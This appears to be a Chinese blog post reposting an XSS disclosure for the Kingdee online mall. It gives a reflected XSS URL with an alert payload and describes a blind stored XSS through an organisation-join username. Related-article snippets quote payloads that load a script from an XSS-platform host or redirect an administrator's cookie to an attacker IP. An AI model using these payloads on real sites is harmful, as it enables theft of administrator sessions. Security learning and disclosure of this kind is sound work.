【漏洞学习——XSS】金蝶商城xss盲打

最新推荐文章于 2025-06-02 15:27:06 发布
原创 最新推荐文章于 2025-06-02 15:27:06 发布 · 483 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文揭示了金蝶商城存在的三处小XSS漏洞及一处反射型XSS漏洞,详细描述了通过搜索框触发XSS的过程。同时,披露了一个较为严重的后台盲打组织成员的漏洞,该漏洞允许攻击者在特定条件下对任意组织账户发起攻击。

地址:http://mall.kingdee.com/cart.action
1、三处小的xss (鸡肋)

2、一处反射型的xss, 位于商城主页的搜索处(鸡肋)

http://mall.kingdee.com/search.action?k=%3Cscript%3Ealert%282%29%3B%3C%2Fscript%3E

3、后台盲打组织成员(较严重)
注册了两个帐号进行测试,用B账户申请加入A账户的组织中,盲打A账户!

申请加入A账户创建的组织中,当然也不非得是A账户的组织,也可以是任意的组织!所以才会出现盲打任意组织账户!
A账户当后台查看B账户的申请记录的时候,B账户的用户名处的xss跨站被触发。

参见:https://bugs.shuimugan.com/bug/view?bug_no=94923

 

XSS盲打:当攻击者“盲狙”管理员
m0_58442919的博客
02-14 1009
XSS盲打并不是一种新的漏洞类型,而是一种攻击场景。攻击者输入的内容不会在前端显示,而是可能被后台管理员看到。换句话说,攻击者看不到自己的输入是否被执行,只能“盲狙”管理员。XSS盲打的本质是存储型XSS漏洞,因为攻击者输入的内容被存储在服务器上,并在管理员查看时输出到页面。如果后台没有对输入内容进行过滤或转义,恶意脚本就会被执行。​XSS盲打是一种“盲狙”式的攻击方式,攻击者看不到前端的反馈,但却可能一击致命,直接拿下管理员权限。
某次日常xss盲打
召唤大白的博客
03-09 397
今天接到个渗透测试的活,基本上就是静态站,本来也不报啥希望了,扫了一圈整个站就一个留言功能,根据经验一般留言就是在标签里,所以右键查看下元素,确定留言内容确实在里面,随手一个xss盲打未拦截,成功提交留言。 盲打使用的xss平台的默认模块Payload: ccc”</tExtArEa><sCRiPt sRC=https://xss8.cc/CnQ6></sCrIpT><textarea> 快下班时意外收到了弹回来的cookie,并且定位到了该站后台地址如下图,
什么是xss盲打
weixin_34334744的博客
10-26 165
什么是xss盲打?         盲打仅仅是一种惯称的说法,就是不知道后台不知道有没有xss存在的情况下,不顾一切的输入xss代码在留言啊,feedback啊之类的地方,尽可能多的尝试xss的语句与语句的存在方式,就叫盲打。        “xss盲打”是指在攻击者对数据提交后展现的后台未知的情况下,站点採用了攻击者插入了带真实攻击功能的xss攻击代码(一般是使用script标签引入...
XSS盲打
Naive_boy00的博客
10-15 2727
XSS的查找:绕过过滤机制,利用服务端错误的编码方式例:url:http//www.foo.com/xss.php?id=1HTML标签之间<div>[输出]</div> //xsspayload:<script>alert(1)</script>标签之间无法执行脚本,要先闭合掉对应的标签。此类标签有:<title></title> <textarea></textarea> <xmp></xmp>
iwebsec 靶场 —— XSS 漏洞
技术笔记
10-31 474
xss
DVWA——XSS注入复现
qq_62056583的博客
07-13 2166
在对DVWA靶场漏洞复现前,先了解一下XSS漏洞的相关知识攻击者利用它向网页中注入恶意的客户端脚本,使得用户在访问页面时执行这些恶意脚本,从而达到攻击的目的。这种攻击通常利用了网站未对用户输入进行充分过滤或转义的情况。XSS的攻击方式分为三种,分别是:分别为反射型(Reflected),存储型(Stored)和DOM型。:只是简单地把用户输入的数据反射给浏览器,简单来说,黑客往往需要用户诱使用户点击一个恶意链接,才能攻击成功。(经后端,不经数据库):将用户输入的数据存储在服务器端。
漏洞进阶之——XSS万能超级无敌全通杀payload
LizePing_的博客
07-10 7185
XSS万能超级无敌全通杀payloadpayload——payload—— —————————————— 抱歉起的名字猖狂了点,我认,但我不改 —————————————— payload—— payload——
关于xss盲打关于xss盲打
u012614598的专栏
11-21 1119
关于xss盲打关于xss盲打      又到了各种年终总结的时候了,先祝各位看官“圣诞快乐”。我记得有朋友问我在2012年里有没有“猥琐流”比较出彩的东西时,我给的答案是“xss盲打”!   关于“盲打”这个词语的出现,最早应该是在wooyun里id为“胯下有杀气”的马甲提出的。最早的一个wooyun案列是2012年7月提交的《WooYun-2012-09547》 ,由此xss盲打火了起来,
XSS跨站脚本攻击之——XSS盲打
温柔小薛的博客
04-05 870
XSS盲打 XSS盲打就是攻击者在前端提交的数据不知道后台是否存在xss漏洞的情况下, 提交恶意JS代码在类似留言板等输入框后,所展现的后台位置的情况下, 网站采用了攻击者插入的恶意代码, 当后台管理员在操作时就会触发插入的恶意代码, 从而达到攻击者的目的。 方法 ‘’‘><script>alert('123')</script>+攻击代码 在文本框提交 ...
8.XSS盲打
愿听风成曲
06-25 508
首先在xss盲打界面输入攻击代码和随意的大名提交即可。管理员界面直接会弹出xss界面。
xss盲打以及盲打实验演示
qq_42764906的博客
04-23 453
输入 得到 输入 得到 理论上是输出到了管理者模式 进入该模式 账号admin 密码123456 得到
Pikachu靶场:XSS盲打
witwitwiter的博客
04-17 2440
Pikachu靶场:XSS盲打 实验环境以及工具 Firefox浏览器、Burp Suite、Pikachu靶场 实验原理 ●xss盲打也是属于存储型XSS类型 盲打的意思是无法直接在前端看到反馈效果。 xss盲打类型交互的数据会被存在在数据库里面,永久性存储,一般出现在留言板,问卷调查等页面。 形成XSS漏洞的主要原因是程序对输入和输出的控制不够严格,导致“精心构造”的脚本输入后,在输到前端时被浏览器当作有效代码解析执行从而产生危害。存储型XSS漏洞跟反射型形成的原因一样,不同的是存储型XSS下攻击者可以
XSS漏洞---XSS盲打
Ethan024的博客
03-13 382
XSS漏洞(本文仅供技术学习与分享) XSS盲打 实验准备: 皮卡丘靶场; 实验步骤: 输入无害字符串来查看效果,发现该字符串已经提交到后台; 输入一个JavaScript脚本 — alert(2222) 发现也并没有弹框 3. 登录管理员界面查看后台,发现登录就会弹框 4. 其本质就是XSS存储型漏洞。 ...
XSS盲打基本概念
Fizz`s Blog
04-02 913
感觉XSS盲打属于比较无赖的。。。做不好自己的伪装还可能被定位。简单来说,盲打就是在一切可能的地方尽可能多的提交xss语句,然后看哪一条会被执行,就能获取管理员的cooike。趁着没过期赶紧用了,这样就能直接管理员进后台。然后再上传一句话,大马最终渗透进内网。这种属于没什么技术含量,甚至可以脚本自动化完成的事情。Web安全的低门槛和入门时的高成就感着实吸引了不少人。...
XSS盲打、绕过
0xcc'Blog
04-28 3642
#0x00:XSS盲打 尽可能地于一切可能的地方提交XSS语句,只要后台管理员看到某一条语句,此语句就能被执行。 可以再留言板上留下获取cookie的代码,只要管理员在后台看到,就能获取管理员的cookie。 #0x01:XSS绕过 通常有以下几种方法 0.前端限制——抓包重放/直接F12修改前端代码 1.大小写——<SCriPt>AleRt(test)</ScRipt&...
XSS攻击:简单的盲打实验
weixin_43726152的博客
05-13 450
什么是盲打? 就是提交的恶意js给后台,但前端是看不见的,我们就不知道这里是否有漏洞。 比如意见箱: 但是值得试试,因为一旦管理员进入后台查看,就会中招 我们这里重复做获取管理员cookie这个实验,获取了管理员的cookie危害很大,攻击者可以用这个管理员cookie免密登入: 目标主机:win10 192.168.56.133 攻击主机:win10 192.168.56.132 构造payload <script>document.location = 'http://192.168.56
pikachu靶场通关笔记10 XSS关卡06-XSS盲打
最新发布
mooyuan的网络安全博客
06-02 1406
本系列为通过《pikachu靶场通关笔记》的XSS关卡(共10关)渗透集合,通过对XSS关卡源码的代码审计找到真实原因,讲解XSS的原理并进行渗透实践,本文为XSS第06关-XSS盲打的渗透部分,并且结合源码分析,对比通用的XSS攻击讲解攻击成因。
XSS漏洞检测新工具——XSS-Scan深入研究
从给定的文件信息中,我们可以提炼出关于Web漏洞爬虫工具的相关知识点,具体涉及到XSS漏洞的产生、利用方式、检测机制以及网络爬虫技术在安全审计中的应用。 首先,我们需要明确XSS漏洞(跨站脚本攻击)的定义。XSS...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值